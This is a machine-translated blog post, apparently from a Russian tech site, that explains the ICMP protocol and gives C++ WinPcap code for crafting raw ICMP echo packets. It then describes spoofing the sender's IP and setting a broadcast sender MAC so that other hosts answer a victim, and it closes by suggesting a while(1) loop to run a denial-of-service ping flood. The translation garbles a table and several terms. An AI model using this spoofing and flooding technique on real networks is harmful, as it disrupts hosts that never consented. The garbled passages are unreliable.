Ping-flooding attack using WinPcap



ICMP protocol



ICMP is one of the components of the TCP / IP (Transmission Control Protocol / Internet Protocol) stack that compensates for the inability of the IP protocol to deliver data reliably. At the same time, ICMP does not eliminate the unreliability of data transmission by IP. It only notifies the sender of the data that there were problems with their delivery.

The figure shows the place of ICMP in the TCP / IP model.


ICMP is an error reporting mechanism for IP.
If an error occurs during the delivery of the datagram, ICMP reports this to the sender of the datagram. For example, suppose PC1, shown in the following figure, sends a PC4 datagram. If the corresponding interface of the Border router fails, this router uses the ICMP protocol to send PC1 a message stating that the datagram could not be delivered. ICMP does not resolve the problem that occurs on the network.


ICMP messages are delivered using IP.
ICMP messages are encapsulated in datagrams, just like regular data delivered over IP. The table shows the encapsulation of the ICMP packet in the data field of the IP datagram. The frame header can be formed using a LAN protocol, such as Ethernet, or a distributed network protocol, such as, for example, HDLC.


Header Frame Header IP-datagram header ICMP Protocol Data Protocol ICMP
header frame Header IP-datagrams are IP-datagram data field
header frame data field of IP-datagram
header frame data field of a frame


When data arrives at the network layer, it is encapsulated in a datagram. After that, the datagram and the data encapsulated in it are again encapsulated in the frame at the data link layer. ICMP messages contain their own information in the headers. However, this information, together with the ICMP protocol data, is encapsulated in a datagram and transmitted in the same way as all other data. Therefore, error messages are also at risk of being lost during transmission. Thus, a situation may arise in which the error messages themselves can create new errors, which will only complicate the situation with congestion in the network already working with failures. For this reason, errors generated by ICMP messages do not generate their own ICMP messages. Therefore, there may be a case when an error occurs during the delivery of the datagram,

WinpCap butting and sending pings


Everyone knows the ping command, which is designed to send an echo request and receive an echo reply. We decided that system ping was not enough for us and tried to implement our ping program.
The implementation tool was the C ++ compiler and the WinPcap library . WinPcap - A low-level library for interacting with network interface drivers.
And so we begin the assembly of the ICMP packet.
The ICMP packet format was successfully taken from the Wiki .

Octet012345678910eleven12thirteen14fifteen1617181920212223242526272829ththirty31
0-3A typeThe codeCheck sum
...Data (format depends on the values ​​of the "Code" and "Type" fields)


u_char packet[1514]; //собственно наш пакет
//MAC-адрес получателя
packet[0]=0x08;
packet[1]=0x00; 
packet[2]=0x27;
packet[3]=0x4c;
packet[4]=0x18;
packet[5]=0xDA;
 ////MAC-адрес отправителя
packet[6]=0x08;
packet[7]=0x00; 
packet[8]=0x27;
packet[9]=0xca;
packet[10]=0xb8;
packet[11]=0x44;
//Формирование IP-заголовка
packet[12]=0x08; 
packet[13]=0x00;
packet[14]=0x45; 
packet[15]=0x00;
	//Длинна пакета
*(WORD *)&packet[16] = htons(1500); 
packet[18]=0x11; //id
packet[19]=0x22;
packet[20]=0; //фрагментацию отключаем
packet[21]=0;
packet[22]=0x80; //ttl
packet[23]=1;    //icmp
packet[24]=0; //контрольная сумма
packet[25]=0;    
	//От кого
packet[26]=192; 
packet[27]=168;    
packet[28]=1; 
packet[29]=1;
       //куда
packet[30]=192; 
packet[31]=168;    
packet[32]=1; 
packet[33]=128;
chS=ComputeIPChecksum(&packet[14],20); //считаем контрольную сумму
printf("%x\n", chS);
*(WORD *)&packet[24] = chS;
//****************************************************
packet[34]=8; //icmp
packet[35]=0;    
packet[36]=0x29; //csum
packet[37]=0x31;    
packet[38]=0x11; //icmp
packet[39]=0x11;    
packet[40]=0x22; //csum
packet[41]=0x22;
chS=ComputeIPChecksum(&packet[34],8);
printf("%x\n", chS);
	for(i=42; i<1514; i++)
	{
		packet[i]= 'A';
	}
//отправляем
if (pcap_sendpacket(fp,	// Adapter
		packet,				// buffer with the packet
		1514					// size
		) != 0)
	{
		fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp));
		return 3;
	}


We will see the results in the following figure.



We see the request and response. All OK.
But what if you put the left MAC address of the sender?
But what if you put the left IP address of the sender?
But what if MAC = FF-FF-FF-FF-FF-FF?


You can go to the Wiki and see the following:

ICMP packets are never generated in response to IP packets with a broadcast or multicast address, so as not to cause network congestion (the so-called "broadcast storm").

Let's try to break this rule. From a machine with IP 192.168.1.2, we will send ping to 192.168.1.3, with the sender's IP equal to 192.168.1.1, and the sender's MAC FF-FF-FF-FF-FF-FF.

It turned out that we forced 192.168.1.3 to respond 192.168.1.1, despite the fact that the latter did not want this. The most interesting thing is that it was broadcast ping and it passed!

We look at other cars.


On other typewriters we catch broadcast requests.
And if so, that is, an occasion to write in the while (1) program and enjoy the DOS attack.

References:

Odom W. - CISCO Official Certification Exam Preparation Guide CCENTCCNA ICND1 - 2010
en.wikipedia.org

Also popular now: